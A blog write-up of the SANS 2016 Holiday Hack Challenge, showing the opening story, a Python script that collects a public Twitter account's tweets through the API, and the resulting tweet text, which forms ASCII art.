Solving the SANS 2016 Holiday Hack Challenge


tl;dr: SANS released the 2016 Christmas Holiday Hack Challenge. This serves as my official submitted answer, and my offering to you, dear reader, in case you want to see how I approached the challenges.

So settle in, this is going to be a long post. At the time of writing the challenge is still live, and SANS typically keeps the servers up so the historical challenges can still be played. As this is a long post you may not want to read it all; if you're here looking for help or the answer to a specific challenge, jump straight to that question.


Ruined presents. A shattered Christmas tree. Needles strewn all about. Obvious signs of a fight. And there, beside it all, was Santa’s big blue sack. But Santa himself was nowhere to be found.

In shock, Jessica uttered, “Someone has abducted Santa Claus!”

Josh was horrified. “Who would do such a thing? And on Christmas Eve, no less. They’ll destroy Christmas! But why?”

The kids scanned for clues, and there on the floor, they found a most unexpected item: a small, rectangular piece of cardstock. Picking it up, Joshua announced, “Hey! This looks like Santa’s business card. It must have fallen out of his pocket while someone was kidnapping him.”

Jess took the card from Joshua’s hands and read it. “It is his business card. And we’re the only ones who know that Santa has disappeared. We’ve got to do something. If we don’t find and rescue Santa, Christmas will be destroyed! Let’s look closer at this card to see if it can be any help in finding out what happened.”

From the business card we got from talking to the Dosis children we now know Santa’s social media accounts.

Taking a look at the @santawclaus feed we can see a lot of seemingly random text. It will be much easier to read if it's all in one place. Twitter has an API we can use to read tweets, and a quick Google search turns up some really useful sample code we can adjust.

# Source: http://www.craigaddyman.com/mining-all-tweets-with-python/
from twython import Twython  # pip install twython
import time  # standard lib

''' Go to https://apps.twitter.com/ to register your app to get your api keys '''
CONSUMER_KEY = ''
CONSUMER_SECRET = ''
ACCESS_KEY = ''
ACCESS_SECRET = ''

twitter = Twython(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_KEY, ACCESS_SECRET)
lis = [798175529463676928]  ## this is the latest starting tweet id

for i in range(0, 16):  ## iterate through all tweets, one page of up to 200 per request
    ## tweet extract method with the last list item as the max_id
    ## (max_id is inclusive, so the boundary tweet is returned again on the
    ## next page; use lis[-1] - 1 if you want to avoid the repeated line)
    user_timeline = twitter.get_user_timeline(screen_name="santawclaus",
                                              count=200, include_retweets=False,
                                              max_id=lis[-1])

    with open('tweetout.txt', 'a') as out:
        for tweet in user_timeline:
            print(tweet['text'])  ## print the tweet
            lis.append(tweet['id'])  ## append tweet ids; the last one seeds the next request
            out.write('{0}\n'.format(tweet['text']))

    time.sleep(30)  ## pause between requests to stay inside the API rate limit

Running this outputs:

SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ
JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ
CHRISTMASHOHOHOELFQQ...............dQ,..........>GOODWILLTOWARDSMENHOHOHOQQ
GOODWILLTOWARDSMENQQL.............>QQm,........_HOHOHOHOHOHOCHRISTMASELFELF
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ
SANTACHRISTMASCHRISTMASJOYWP"`.........-"9NORTHPOLEPEACEONEARTHCHRISTMASELF
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ
ELFELFELFHOHOHOHOHOHOQQ@'..................."$CHRISTMASELFSANTANORTHPOLEELF
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN
NORTHPOLEELFELFELFQQ@`.........................-QWPEACEONEARTHPEACEONEARTHQ
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ
CHRISTMASSANTAELFQ[........>HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....>SANTAHOHOHONORTHPOLEELFSANTA
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ
SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY
JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF
NORTHPOLEJOYELFJOYf.......)ELFQ@........??'.......]CHRISTMASPEACEONEARTHJOY
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ
CHRISTMASHOHOHOJOYQm...............dQ,..........>GOODWILLTOWARDSMENQWSANTAQ
SANTACHRISTMASSANTAQL.............>QQm,........_JOYELFGOODWILLTOWARDSMENELF
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY
HOHOHOPEACEONEARTHELFJOYJOYQV?"~....--"?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ
GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF
PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO
SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ@.......:NORTHPOLEELFQWSANTASANTA
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......>HOHOHOSANTANORTHPOLEQQWQ
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO
CHRISTMASCHRISTMASL........."HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO
GOODWILLTOWARDSMENm............"!???!"`...........NORTHPOLEHOHOHOWJOYQWELFQ
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ
SANTAPEACEONEARTHJOY/...........................>NORTHPOLECHRISTMASHOHOHOQQ
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ
CHRISTMASJOYSANTANORTHPOLEV?"-....................]GOODWILLTOWARDSMENQWJOYQ
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO
PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMEN[.........-"????????????????????4ELFCHRISTMASHOHOHOQQWELF
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF
SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ
JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO
CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ
JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO
SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF
HOHOHOGOODWILLTOWARDSMENSANTAWJOYQ@'.............sPEACEONEARTHELFWCHRISTMAS
GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ
SANTAGOODWILLTOWARDSMENQQWELFQQ@'.............sQWGOODWILLTOWARDSMENJOYJOYQQ
NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ
NORTHPOLECHRISTMASELFQQWELFQ@'.............aWCHRISTMASELFPEACEONEARTHQQWELF
SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY
CHRISTMASSANTACHRISTMASQQ@'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF
SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ
PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO
HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ
